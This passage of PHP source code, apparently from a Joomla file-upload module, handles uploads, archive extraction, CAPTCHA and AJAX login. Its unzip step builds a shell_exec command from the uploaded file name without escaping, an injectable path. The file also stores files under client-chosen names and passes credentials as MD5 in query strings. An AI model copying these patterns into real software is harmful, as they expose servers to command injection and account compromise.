													$results .= JText::_('IMG_RESIZE_FAIL')."<br />";
											} else {
												$image_resize = false;
											}
											
											imagedestroy($oim);
											if ($thumbfilename !== "") imagedestroy($ttim);
											
										} else {
											
											$fileErr = 1;
											$results .= JText::_('FAIL_REQUEST') . "<br />";
											$_SESSION["failedfile"] .= $_FILES["uploadedfile$mid"]["name"][$cnt]." (".JText::_('IMG_SAVE_FAIL').", ".$errmsg.")</br />";
										}
									}
									
									if (($img = @getimagesize($_FILES["uploadedfile$mid"]["tmp_name"][$cnt])) && (!$image_resize) && ($upload_compressimg !== "") && is_numeric($upload_compressimg)) {
										// Compress JPEG? This only happens if no resize!
										list($width, $height, $type, $attr) = getimagesize($_FILES["uploadedfile$mid"]["tmp_name"][$cnt]);
										
										// Make sure we have a valid compression ratio
										if ($upload_compressimg > 100 || $upload_compressimg <= 0) $img_compressimg = 100;
										
										if (($type == 2) && (is_numeric($img_compressimg)) && ($fileErr == 0)) {
										
											$oim = imagecreatefromjpeg($_FILES["uploadedfile$mid"]["tmp_name"][$cnt]);
											
											if (imagejpeg($oim, $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt], $img_compressimg)) {
												$fileErr = 0;
												$image_resize = true;
											} else {
												$fileErr = 1;
												$results .= JText::_('FAIL_REQUEST') . "<br />";
												$_SESSION["failedfile"] .= $_FILES["uploadedfile$mid"]["name"][$cnt]." (".JText::_('IMG_COMPRESS_FAIL').")</br />";
											}
											imagedestroy($oim);
										}
										
										// Compress PNG? This only happens if no resize!
										if (($type == 3) && (is_numeric($upload_compressimg)) && ($fileErr == 0)) {
										
											$oim = imagecreatefrompng($_FILES["uploadedfile$mid"]["tmp_name"][$cnt]);
											
											$img_compressimg = round($upload_compressimg / 100); // Quality is 0-9 for PNG
											if ($img_compressimg >= 10) $img_compressimg = 9; // If user has set quality to 100
											
											if (imagepng($oim, $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt], $img_compressimg)) {
												$fileErr = 0;
												$image_resize = true;
											} else {
												$fileErr = 1;
												$results .= JText::_('FAIL_REQUEST') . "<br />";
												$_SESSION["failedfile"] .= $_FILES["uploadedfile$mid"]["name"][$cnt]." (".JText::_('IMG_COMPRESS_FAIL').")</br />";
											}
											imagedestroy($oim);
										}
										
										if ($image_resize)
											$results .= JText::_('IMG_ORIG_COMPRESS')."<br />";
										else
											$results .= JText::_('IMG_COMPRESS_FAIL')."<br />";
									}	
								}

								// If image has been resized it is already saved
								if (!$image_resize) {
									if (move_uploaded_file($_FILES["uploadedfile$mid"]["tmp_name"][$cnt], $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt])) {
										$fileErr = 0;										
									} else {
										$fileErr = 1;
										$results .= JText::_('FAIL_REQUEST') . "<br />";
										$_FILES["uploadedfile$mid"]["name"][$cnt] = "";
									}
								}
								
								
								// Form Fields
								if (($upload_useformsfields == 1) && (strlen($upload_formfields) > 0) && ($fileErr == 0)) {

									$fields = explode(";", $upload_formfields);
									$valname = "";
									$valfile = "";
									$ffform = "";
									$fffield = "";
									$formfieldsemail[$cnt] = "";

									if ($upload_nohtmlencoding == 1)
										$ffform = trim ( $_REQUEST["sfuFormFields$mid"] );
									else
										$ffform = htmlentities ( trim ( $_REQUEST["sfuFormFields$mid"] ) , ENT_NOQUOTES , "utf-8" );
									if ($upload_debug == 1) print_r($_REQUEST);
									
									if ($upload_replacetag == 1) $ffform = str_replace(">", "&gt;", str_replace("<", "&lt;", $ffform));

									if ($upload_debug == 1) $results .= "ffform=$ffform<br/>";
									$ffform = explode("[||]", $ffform);
									
									// If create a row in the form fileds file...
									if (strlen($upload_formfieldsfile) > 0)
										$valfile = $_FILES["uploadedfile$mid"]["name"][$cnt].$upload_formfieldsdiv;
									
									for ($iff = 0; $iff < count($ffform); $iff++) {
										$valname = $ffform[$iff];
										
										$fffield = explode("=", $valname);
										
										foreach ($fields as $fld) {
										
											$valname = "sfuff".$mid."_".$fld."_".$_FILES["uploadedfile$mid"]["name"][$cnt];
											if ($valname === $fffield[0]) {
												if (strlen($upload_formfieldsfile) > 0)
													$valfile .= $fffield[1].$upload_formfieldsdiv;
												else
													$valfile .= $fld."=".$fffield[1]."\n";
												// Store for e-mail, use same counter as file
												$formfieldsemail[$cnt] .= $fld."=".$fffield[1]."\n";
											}
										}
										
										if ($upload_debug == 1) $results .= "valname=$valname<br/>";
										
									}
									
									if (strlen($upload_formfieldsfile) > 0) {
										// Remove last pipe
										$valfile = substr($valfile, 0, -1);
										// Check if we got something
										if ($valfile === $_FILES["uploadedfile$mid"]["name"][$cnt]) 
											$valfile = "";
									}
									
									if ($upload_debug == 1) $results .= "valfile=$valfile<br/>";
									if ((strlen($valfile) > 0) && (strlen($upload_formfieldsfile) == 0)) {
										// Write the file:
											
										$ffFile = $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt] . ".txt";
											
										if ($upload_debug == 1) $results .= "ffFile=$ffFile<br/>";
										$fh = fopen($ffFile, 'w') or $fileErr = 1;
										if ($fileErr == 1) {
											$results .= JText::_('FAIL_FORMFIELDS_FILE') . "<br />";
										} else {
											// For some mysterious reason PHP refuses to write UTF-8 as UTF-8. Some stupid work-around below found at php.net
											$valfile = mb_convert_encoding( $valfile, 'UTF-8'); 
											fwrite($fh, $valfile);
											fclose($fh);
										}
									
									}
									// Store for Form Fields File, use same counter as file
									$formfieldsval[$cnt] = $valfile;
								}
						
								
								if (($upload_popshowpath == 1) && ($fileErr == 0)) {
									$results .= JText::sprintf('FILE_SAVE_AS', '<a href="'.$baseurl.str_replace(" ", "%20", $_FILES["uploadedfile$mid"]["name"][$cnt]).'" target="blank">'.$baseurl.$_FILES["uploadedfile$mid"]["name"][$cnt].'</a>').'<br /><br />';
								}
								
								if ($upload_fileexist === "1" && file_exists($new_filename)) {
									if ($fileErr == 0) {
										// Delete (=replace) of old file
										unlink($new_filename);
									} else {
										// Put original back if something went wrong
										rename($new_filename, $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt]);
									}
								}
								//$results .= "<div style=\"width: 90%; text-align: right; \"><input type='button' value='" . JText::_('OK_BUTTON') . "' onclick='document.getElementById(\"div_simplefileuploadmsg\").style.display=\"none\";'></div>";
							}
						}

						// UNZIP
						if (($upload_unzip == 1) && ($fileErr == 0)) {
							if (($_FILES["uploadedfile$mid"]["type"][$cnt] === "application/x-tar") || ($_FILES["uploadedfile$mid"]["type"][$cnt] === "application/x-tar-compressed") || ($_FILES["uploadedfile$mid"]["type"][$cnt] === "application/tar-compressed")) {
								//system("tar -zxvf ".$upload_location.$_FILES["uploadedfile$mid"]["name"]);
								$res = shell_exec("cd ".$upload_location.";tar -xvzf ".$_FILES["uploadedfile$mid"]["name"][$cnt].";");
								if ($res === FALSE) {
									$results .= "<p>".JText::_('MSG_UNZIP_ERROR')."</p>";
								} else {
									$results .= "<p>".JText::_('MSG_UNZIP')."</p>";
								}
							}
							if (($_FILES["uploadedfile$mid"]["type"][$cnt] === "application/x-zip") || ($_FILES["uploadedfile$mid"]["type"][$cnt] === "application/x-zip-compressed") || ($_FILES["uploadedfile$mid"]["type"][$cnt] === "application/zip-compressed")) {
								$zip = new ZipArchive;
								$res = $zip->open($upload_location.$_FILES["uploadedfile$mid"]["name"][$cnt]);
								if ($res === TRUE) {
									$zip->extractTo($upload_location);
									$zip->close();
									$results .= "<p>".JText::_('MSG_UNZIP')."</p>";
								} else {
									$results .= "<p>".JText::_('MSG_UNZIP_ERROR')."</p>";
								}
							}
						}
						$_SESSION["uploaderr$mid"] = $fileErr;
					} else {
						$fileErr = 1;
						$errmsg = "(<span style='color:#dd2222'>".$_FILES["uploadedfile$mid"]["name"][$cnt].")</span><div>".JText::sprintf('FILE_IN_ERROR', $filetype)."<br />&nbsp;&nbsp;[".ModSimpleFileUploaderHelperv13::errCodeToMessage($_FILES["uploadedfile$mid"]["error"][$cnt])."]</div><br />";
						$_SESSION["uploaderr$mid"] = 1;
						if ($upload_showerrmsg == 1)
							$results .= $errmsg;
						else
							$results .= JText::_('UPLOAD_FAILED')."<br /><br />";
						
						if ($written == 0) {
							$filesize = ModSimpleFileUploaderHelperv13::getFileSizePP($upload_maxsize);
							$results .= JText::_('ALLOWED_TYPES') . ": " . $upload_filetypes . "<br />" . JText::_('FILE_MAX_SIZE') . ": " . $filesize . "<br /><br />";
							//$results .= "<div style=\"width: 90%; text-align: right;\"><input type='button' value='" . JText::_('OK BUTTON') . "' onclick='document.getElementById(\"div_simplefileuploadmsg\").style.display=\"none\";'></div>";
							$written = 1;
						}
					}
				} else {
					if ($upload_users === "false") {
						$_SESSION["uploaderr$mid"] = 1;
						$results .= JText::_('NOT_ALLOWED_USER');
					}
				}
			} // end for

			// Create Form Fields file
			if ((count($formfieldsval) > 0) && (strlen($upload_formfieldsfile) > 0)) {
				// Write the file but read first if the same file exists from previous set:
				$valfile = "";
				
				$ffFile = $upload_location . $upload_formfieldsfile;
				
				if (file_exists($ffFile)) {
					//RegExp can't handle pipe, make it escaped
					// !! Not needed for explode(), only deprecated split() !!
					//$upload_formfieldsdiv2 = $upload_formfieldsdiv;
					//if ($upload_formfieldsdiv === "|") $upload_formfieldsdiv2 = "\|";
					
					$fileRows = explode("\n", file_get_contents($ffFile));
					for ($cnt = 0; $cnt<count($fileRows); $cnt++) { 
						$rowdata = $fileRows[$cnt];
						//Remove the UTF-8 chars
						//if (substr($rowdata, 0, 2) === chr(255).chr(254)) $rowdata = substr($rowdata, 2);
//echo "rowdata=$rowdata<br/>";
						if (strpos($rowdata, $upload_formfieldsdiv) >= 0) {
							$rowArray = explode($upload_formfieldsdiv, $rowdata);
							if (strlen($rowArray[0]) > 0) {
								$found = false;
								for ($cnt2 = 0; $cnt2<count($formfieldsval); $cnt2++) {
									$ffArray = explode($upload_formfieldsdiv, $formfieldsval[$cnt2]);
//echo "{".$ffArray[0]."}={".$rowArray[0]."}<br/>";
//echo "replace: [".str_replace($ffArray[0], "", $rowArray[0])."]<br/>";
									// Equal on string seems not reliable. Maybe encoding issues but replace does the trick it seems.
									//if ($ffArray[0] === $rowArray[0]) {
									if (strlen(str_replace($ffArray[0], "", $rowArray[0])) == 0) {
//echo "inside!<br/>";									
										$valfile .= $formfieldsval[$cnt2]."\n";
										$formfieldsval[$cnt2] = "";
										$found = true;
										break;
									}
								}
								if (!$found) $valfile .= $rowdata."\n";
							}
						}
					}
				}

				$fh = fopen($ffFile, 'w') or $fileErr = 1;
				if ($fileErr == 1) {
					$results .= JText::_('FAIL_FORMFIELDS_FILE') . "<br />";
				} else {
				
					for ($cnt = 0; $cnt<count($formfieldsval); $cnt++) {
						// Add the new files here
						if (strlen($formfieldsval[$cnt]) > 0)
							$valfile .= $formfieldsval[$cnt]."\n";
					}
					
					// Don't make the file UTF-8 here as it totally messes up the reading of the file!
					// For some mysterious reason PHP refuses to write UTF-8 as UTF-8. Some stupid work-around below found at php.net
					//$valfile = chr(255).chr(254).mb_convert_encoding( $valfile, 'UTF-16LE', 'UTF-8'); 
					
//echo "valfile=$valfile<br/>";
					fwrite($fh, $valfile);
					fclose($fh);
				}
			
			}
			
			// SHOW DIR CONTENT
			if (($upload_showdircontent == 1) && ($fileErr == 0)) {
				$results .= "<br /><div style=\"text-align: left\">";
				if($bib = @opendir($upload_location)) {
					while (false !== ($lfile = readdir($bib))) {
						//if($lfile != "." && $lfile != ".." && !ereg("^\..+", $lfile) && $lfile != "index.html") {
						if($lfile !== "." && $lfile !== ".." && !preg_match("/^\..+/", $lfile) && $lfile !== "index.html") {
							$fil_list[] = "<a href=\"$upload_location/$lfile\" target=\"blank\">$lfile</a>";
						}
					}
					closedir($bib);
					
					if(is_array($fil_list)) {
						$liste = "<li>" . join("</li><li>", $fil_list) . "</li>";
					} else {
						$liste = "<li>" . JText::_('NO_FILES_FOUND') . " " . $upload_location . "</li>";
					}
					$results .=  "<h2>" . JText::_('FILES_IN_DIR') . " (" . $upload_location . "):</h2><ul>" . $liste . "</ul>";
				} else {
					//die("Could not read files in " . $upload_location);
					$results .=  "<h2>" . JText::_('NO_FILES_FOUND') . "</h2><br/>";
				}
				$results .= "</div><br/>";
			}

			// SEND E-MAIL
			if ((strlen($upload_email) > 0) && ($fileErr == 0)) {
				$to = $upload_email;
				$subject = JText::_('MAIL_SUBJECT');
				$infos = explode("|", $fileInfo);
				$text = "";
				$headers = "";
				//Replace space with %20 for URL
				if ($upload_emailhtml == 0) {
					for ($cnt = 0; $cnt<$fileCnt;  $cnt++) {
						if(strlen($_FILES["uploadedfile$mid"]["name"][$cnt]) > 0)
							$text .= $upload_location.$_FILES["uploadedfile$mid"]["name"][$cnt]." (".$baseurl.str_replace(" ", "%20", $_FILES["uploadedfile$mid"]["name"][$cnt]).")\r\n";
						if (count($formfieldsemail) >= $cnt+1) {
							if (strlen($formfieldsemail[$cnt]) > 0)
								$text .= $formfieldsemail[$cnt] . "\r\n\r\n";
						}
					}
					$body = JText::sprintf('MAIL_BODY', $_SERVER["HTTP_HOST"]);
					$body .= "\r\n\r\n".$text;
					$body .= "\r\n\r\n(Find out more about Simple File Upload for Joomla at http://wasen.net/)";
				} else {
					$text = "<br /><br/><table>";
					for ($cnt = 0; $cnt<$fileCnt; $cnt++) {
						if(strlen($_FILES["uploadedfile$mid"]["name"][$cnt]) > 0)
							$text .= "<tr><td>".$upload_location.$_FILES["uploadedfile$mid"]["name"][$cnt]." (".$baseurl.str_replace(" ", "%20", $_FILES["uploadedfile$mid"]["name"][$cnt]).")</td><td>".$infos[$cnt]."</td></tr>";
							if (count($formfieldsemail) >= $cnt+1) {
								if (strlen($formfieldsemail[$cnt]) > 0) {
									$fields = explode("\n", $formfieldsemail[$cnt]);
									foreach ($fields as $f)
										$text .= "<tr><td>" . $f . "</td></tr>";
								}
							}
					}
					$text .= "<table><br />";
					$body = JText::sprintf('MAIL_BODY', $_SERVER["HTTP_HOST"]);
					if (strlen($users_name) < 5) $users_name = "Anonymous (@".$_SERVER['REMOTE_ADDR'].")";
					$body .= " ".JText::sprintf('BY_USER', $users_name);
					$body .= $text;
					$body .= "<br /><br/><small>(Find out more about Simple File Upload for <a href='http://www.joomla.org/'>Joomla</a> at <a href='http://wasen.net/'>http://wasen.net/</a>)</small>";
					// To send HTML mail, the Content-type header must be set
					$headers = 'MIME-Version: 1.0' . "\r\n";
					$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
					// Additional headers
					//$headers .= 'To: ' . $to . "\r\n";
					$headers .= 'From: ' . $upload_mailfrom . "\r\n";
				}

				if (mail($to, $subject, $body, $headers)) {
					if ($upload_emailmsg == 1)
						$results .= "<p>".JText::_('MSG_SENT')."</p>";
				} else {
					if ($upload_emailmsg == 1)
						$results .= "<p>".JText::_('MSG_FAILED')."(To:".$to.")</p>";
				}
			}

			return $results;
		}
		
		
		/**
		 * Report whether the GD extension is loaded with PNG, GIF, JPG and WBMP support.
		 *
		 * @return bool true only when GD is loaded and imagetypes() has all four format bits set
		 */
		function gd_get_info() {
			// Check the extension first: imagetypes() and the IMG_* constants only exist when GD is loaded.
			if (!extension_loaded('gd')) {
				return false;
			}

			$supported = imagetypes();
			foreach (array(IMG_PNG, IMG_GIF, IMG_JPG, IMG_WBMP) as $formatBit) {
				if (!($supported & $formatBit)) {
					return false;
				}
			}

			return true;
		}

		/**
		 * Format a byte count as a human-readable size string ("512 B", "1.5 KB", "2 MB", ...).
		 *
		 * Units are powers of 1024 and scaled values are rounded to two decimals.
		 *
		 * @param int|float|string $filesize size in bytes; any falsy value is reported as "0 B"
		 * @return string the size followed by a space and its unit (B, KB, MB, GB or TB)
		 */
		function getFileSizePP($filesize) {
			if (!$filesize) {
				return '0 B';
			}

			// Below one kilobyte the value is printed unscaled and unrounded.
			if ($filesize < 1024) {
				return $filesize.' B';
			}

			// Each row: exclusive upper bound, divisor, unit suffix - checked smallest first.
			$scales = array(
				array(1048576, 1024, ' KB'),
				array(1073741824, 1048576, ' MB'),
				array(1099511627776, 1073741824, ' GB'),
			);
			foreach ($scales as $scale) {
				if ($filesize < $scale[0]) {
					return round($filesize / $scale[1], 2).$scale[2];
				}
			}

			// Anything at or above 1024^4 bytes is expressed in terabytes.
			return round($filesize / 1099511627776, 2).' TB';
		}
		
		/**
		 * Translate a PHP upload error code into a localized message.
		 *
		 * @param int $code one of PHP's UPLOAD_ERR_* values, as found in $_FILES[...]['error']
		 * @return string the JText translation for that code, or the UPLOAD_ERR_DEFAULT text for any other value
		 */
		function errCodeToMessage($code) {
			// Upload error code => language key handed to JText::_().
			$languageKeys = array(
				UPLOAD_ERR_INI_SIZE   => 'UPLOAD_ERR_INI_SIZE',   // file exceeds upload_max_filesize in php.ini
				UPLOAD_ERR_FORM_SIZE  => 'UPLOAD_ERR_FORM_SIZE',  // file exceeds MAX_FILE_SIZE given in the HTML form
				UPLOAD_ERR_PARTIAL    => 'UPLOAD_ERR_PARTIAL',    // file was only partially uploaded
				UPLOAD_ERR_NO_FILE    => 'UPLOAD_ERR_NO_FILE',    // no file was uploaded
				UPLOAD_ERR_NO_TMP_DIR => 'UPLOAD_ERR_NO_TMP_DIR', // missing a temporary folder
				UPLOAD_ERR_CANT_WRITE => 'UPLOAD_ERR_CANT_WRITE', // failed to write file to disk
				UPLOAD_ERR_EXTENSION  => 'UPLOAD_ERR_EXTENSION',  // upload stopped by a PHP extension
			);

			foreach ($languageKeys as $errCode => $languageKey) {
				// Loose comparison on purpose: it matches what a switch statement would accept.
				if ($code == $errCode) {
					return JText::_($languageKey);
				}
			}

			// Unknown upload error.
			return JText::_('UPLOAD_ERR_DEFAULT');
		}
		
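		/**
		 * Look for a GIF Comment Extension in a file and flag it when its text contains "php".
		 *
		 * The file is scanned byte by byte after the 13-byte header for the first 0x21 0xFE
		 * (Comment Extension) pair; scanning stops at that comment, at a 0x3B trailer byte or at EOF.
		 *
		 * Result string:
		 *  - starts with "getGIFComment:BLOCK" when a comment was read and contains "php" (case-insensitive);
		 *  - starts with "getGIFComment:OK" when a comment extension was reached without that text;
		 *  - carries neither marker when the file could not be opened, is not a GIF, or ended
		 *    (trailer/EOF) before a comment extension was seen.
		 * It always ends with "<br/>". With $upload_debug == 1, HTML trace lines are included.
		 *
		 * Security note: this is a heuristic over a single metadata field. Only the first comment
		 * extension is inspected and other parts of the file are not examined, so an "OK" result
		 * does not show that the upload is free of script content. Upload safety has to come from
		 * how files are stored and served (no script execution in the upload directory,
		 * server-chosen file names and extensions, re-encoding images where possible).
		 * NOTE(review): the caller is outside this view - confirm that a result without a marker
		 * is not treated as an approval.
		 *
		 * @param string $filename     path of the file to inspect
		 * @param int    $upload_debug 1 to append debug trace lines to the result
		 * @return string marker (when a comment extension was reached) plus optional debug HTML, ending in "<br/>"
		 */
		function getGIFComment($filename, $upload_debug) {
			$debug = ($upload_debug == 1);
			$retval = "";

			$fd = fopen( $filename, 'rb' );
			if ( !$fd ) {
				if ($debug) $retval .= "<br/>getGIFComment: File failed!";
				return $retval."<br/>";
			}
			if ($debug) $retval .= "<br/>getGIFComment: File opened!";

			// Read GIF header
			$signature = fread( $fd, 6 );
			if ( $signature === 'GIF87a' || $signature === 'GIF89a' ) {
				if ($debug) $retval .= "<br/>getGIFComment: We've found a GIF";

				// Read Logical Screen Descriptor; pad a truncated read so the offsets below always exist.
				$lsd = str_pad( (string) fread( $fd, 7 ), 7, "\0" );
				$width = ( ord( $lsd[1] ) << 8 ) + ord( $lsd[0] );
				$height = ( ord( $lsd[3] ) << 8 ) + ord( $lsd[2] );

				if ($debug) $retval .= "<br/>getGIFComment: GIF width: ".$width;
				if ($debug) $retval .= "<br/>getGIFComment: GIF height: ".$height;

				$done = false;
				while ( !$done ) {
					// An empty or failed read (end of file) is treated as byte value 0.
					$byte = fread( $fd, 1 );
					$blockType = ( $byte === false || $byte === '' ) ? 0 : ord( $byte );

					if ( $blockType == 0x21 ) { // Extension Introducer
						$byte = fread( $fd, 1 );
						$extensionLabel = ( $byte === false || $byte === '' ) ? 0 : ord( $byte );

						if ( $extensionLabel == 0xfe ) { // Comment Extension
							// The comment is a chain of length-prefixed sub-blocks ended by a zero length byte.
							$comment = '';
							while ( true ) {
								$byte = fread( $fd, 1 );
								$blockBytes = ( $byte === false || $byte === '' ) ? 0 : ord( $byte );
								if ( $blockBytes === 0 ) {
									break;
								}
								$chunk = fread( $fd, $blockBytes );
								if ( $chunk === false || $chunk === '' ) {
									break; // truncated file: nothing more to read
								}
								$comment .= $chunk;
							}

							if ( $comment !== '' ) {
								// The comment comes from the uploaded file, so escape it before it is placed in HTML output.
								if ($debug) $retval .= "<br/>getGIFComment: GIF has comment: ".htmlspecialchars( $comment, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
								if ( stripos( $comment, "php" ) !== false ) {
									$retval = "getGIFComment:BLOCK".$retval;
								} else {
									$retval = "getGIFComment:OK".$retval;
								}
							} else {
								if ($debug) $retval .= "<br/>getGIFComment: No GIF comment found!";
								$retval = "getGIFComment:OK".$retval;
							}
							$done = true;
						}
					} else if ( $blockType == 0x3b ) { // Trailer, end of stream
						if ($debug) $retval .= "<br/>getGIFComment: GIF stream terminated by Trailer block";
						$done = true;
					}

					if ( feof( $fd ) ) {
						if ($debug) $retval .= "<br/>getGIFComment: GIF stream terminated by EOF";
						$done = true;
					}
				}
			}

			// Release the handle on every path that opened the file.
			fclose( $fd );

			return $retval."<br/>";
		}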
}
	
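/**
 * AJAX helpers for the Simple File Upload module: CAPTCHA image generation and the
 * small request handlers for user login, CAPTCHA verification and session teardown.
 */
class SFUAjaxServlet {
	/**
	 * Draw a five-character CAPTCHA, store its text in the session and echo the JPEG.
	 *
	 * The text is saved in $_SESSION["capString$mid"]. The image is echoed base64-encoded
	 * when $source is 'site' and as raw JPEG bytes otherwise.
	 *
	 * @param string $sfu_version module version suffix, used to locate the module's tmpl/arial.ttf
	 * @param array  $bgcolor     [min, max] range for each RGB component of the background noise colour
	 * @param string $mid         module id, used as the session key suffix
	 * @param string $source      'site' for base64 output, anything else for raw output
	 * @return void
	 */
	function getCaptcha($sfu_version, $bgcolor, $mid, $source) {
		// Silence GD/font warnings so they cannot end up in the image bytes, and remember
		// the caller's level so it can be restored instead of being forced to E_ALL.
		$previousLevel = error_reporting(0);

		$myCryptBase = "AB0CDE1FG2HIJ3KL4MNO5PQ6RST7UV8WX9YZ";
		$lastIndex = strlen($myCryptBase) - 1;
		$capString = "";
		$image = imagecreatetruecolor(150, 60);
		$white = imagecolorallocate($image, 255, 255, 255);
		$rndm = imagecolorallocate($image, rand($bgcolor[0], $bgcolor[1]), rand($bgcolor[0], $bgcolor[1]), rand($bgcolor[0], $bgcolor[1]));
		imagefill($image, 0, 0, $white);
		$folder_captcha_class = JPATH_SITE.DIRECTORY_SEPARATOR.'modules'.DIRECTORY_SEPARATOR.'mod_simplefileuploadv'.$sfu_version.DIRECTORY_SEPARATOR.'tmpl';
		$fontName = $folder_captcha_class."/arial.ttf";

		// Background noise: short random strokes. Purely cosmetic, so rand() is sufficient here.
		for ($x = 0; $x <= 1000; $x++) {
			$myX = rand(1, 148);
			$myY = rand(1, 58);
			imageline($image, $myX, $myY, $myX + rand(-5, 5), $myY + rand(-5, 5), $rndm);
		}

		for ($x = 0; $x <= 4; $x++) {
			$dark = imagecolorallocate($image, rand(5, 128), rand(5, 128), rand(5, 128));
			// The challenge text is the secret: pick it from the full alphabet (index 0 included)
			// with an unpredictable generator where one is available.
			$capChar = $myCryptBase[self::randomIndex(0, $lastIndex)];
			$capString .= $capChar;
			$fs = rand(20, 26);
			$myX = 15 + ($x * 28 + rand(-5, 5));
			$myY = rand($fs + 2, 55);
			$angle = rand(-30, 30);
			imagettftext($image, $fs, $angle, $myX, $myY, $dark, $fontName, $capChar);
		}
		$_SESSION["capString$mid"] = $capString;

		// Capture the JPEG bytes; null (not "") is the filename value that means "write to output".
		ob_start();
		header("Content-type: image/jpeg");
		imagejpeg($image, null, 95);
		$result = ob_get_contents();
		ob_end_clean();

		if ($source === 'site')
			echo base64_encode($result);
		else
			echo $result;

		imagedestroy($image);
		error_reporting($previousLevel);
	}

	/**
	 * Handle one AJAX action, echo its textual result and close the application.
	 *
	 * Actions:
	 *  - "sfuuser":        compares val1/val2 from the query string with the username and the
	 *                      MD5 of the password held in the session for module "mid"; on success
	 *                      sets $_SESSION["upload_username_ok$mid"] and answers "true".
	 *  - "sfucaptcha":     compares val1 with the CAPTCHA text stored in the session
	 *                      (both upper-cased when val2 is "1") and answers "true" on a match.
	 *  - "sfukillsession": destroys the session and reports the outcome.
	 * Any other action answers "false".
	 *
	 * NOTE(review): credentials arrive in the query string, the session holds the password in
	 * clear text and the client sends an unsalted MD5 that is accepted as the password itself.
	 * Changing that needs the client side and the code that fills the session, both outside this
	 * view; POST over TLS with password_hash()/password_verify() on the server would be the
	 * usual replacement. No attempt limiting is visible here either.
	 *
	 * @param string $action one of "sfuuser", "sfucaptcha", "sfukillsession"
	 * @return void
	 */
	function getContent($action) {
		$retVal = "false";

		if ($action === "sfuuser") {
			$user = self::queryString("val1");
			$pass = self::queryString("val2");
			$mid = (string) self::queryString("mid");
			$session_username = "";
			$session_password = "";
			// TODO: Should I fetch this from DB if session has expired before trying to login... Else it will return failed...
			if (isset($_SESSION["upload_username$mid"])) {
				$session_username = (string) $_SESSION["upload_username$mid"];
				$session_password = isset($_SESSION["upload_password$mid"]) ? (string) $_SESSION["upload_password$mid"] : "";
			}

			if (strlen($session_username) == 0) {
				// Workaround for missing session user... should be from DB I guess...
				$retVal = JText::_('FAIL_CREDENTIALS');
			} else {
				$hashedpw = md5($session_password);
				// Request values must be real strings and are compared strictly: a loose "== 0"
				// test on strcmp() also accepts the null it returns for non-string input.
				$userOk = self::sameString($user, $session_username);
				$passOk = self::sameString($pass, $hashedpw);
				if ($userOk && $passOk) {
					$_SESSION["upload_username_ok$mid"] = $hashedpw;
					$retVal = "true";
				} else {
					$retVal = JText::_('USER_PASS_FAILED');
				}
			}
		}

		if ($action === "sfucaptcha") {
			$captcha = self::queryString("val1");
			$casesense = self::queryString("val2");
			$mid = (string) self::queryString("mid");

			if (!isset($_SESSION["capString$mid"])) {
				// Keep the specific message instead of overwriting it with the generic one below.
				$retVal = JText::_('FAIL_REQUEST') . "\n\n[Session time-out]";
			} else {
				$captchaStored = (string) $_SESSION["capString$mid"];

				if ($casesense === "1") {
					$captchaStored = strtoupper($captchaStored);
					if ($captcha !== null)
						$captcha = strtoupper($captcha);
				}

				if (strlen($captchaStored) == 0) {
					$retVal = JText::_('FAIL_REQUEST');
				} elseif ($captcha !== null && $captchaStored === $captcha) {
					// NOTE(review): the stored text stays in the session after a match, so the same
					// answer can be submitted again. Whether the upload handler re-checks and clears
					// it is not visible from here - confirm before relying on this check alone.
					$retVal = "true";
				} else {
					$retVal = JText::_('FAULTY_CAPTCHA');
				}
			}
		}

		if ($action === "sfukillsession") {
			$ses = session_destroy();

			if ($ses)
				$retVal = "Session destroyed";
			else
				$retVal = "Session still alive";
		}

		$app = JFactory::getApplication();
		echo $retVal;
		$app->close();
	}

	/**
	 * Read a query-string parameter, accepting it only when it is a plain string.
	 *
	 * @param string $key parameter name
	 * @return string|null the value, or null when it is missing or was sent as an array
	 */
	private static function queryString($key) {
		return (isset($_GET[$key]) && is_string($_GET[$key])) ? $_GET[$key] : null;
	}

	/**
	 * Strict string equality that uses hash_equals() (timing-safe) when the runtime has it.
	 *
	 * @param mixed $given    value supplied by the request
	 * @param mixed $expected value held by the server
	 * @return bool true only when both are strings with identical content
	 */
	private static function sameString($given, $expected) {
		if (!is_string($given) || !is_string($expected)) {
			return false;
		}
		if (function_exists('hash_equals')) {
			return hash_equals($expected, $given);
		}
		return $given === $expected;
	}

	/**
	 * Pick a random integer in [$min, $max], preferring random_int() when the runtime has it.
	 *
	 * @param int $min lowest value, inclusive
	 * @param int $max highest value, inclusive
	 * @return int
	 */
	private static function randomIndex($min, $max) {
		return function_exists('random_int') ? random_int($min, $max) : mt_rand($min, $max);
	}

}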

?>
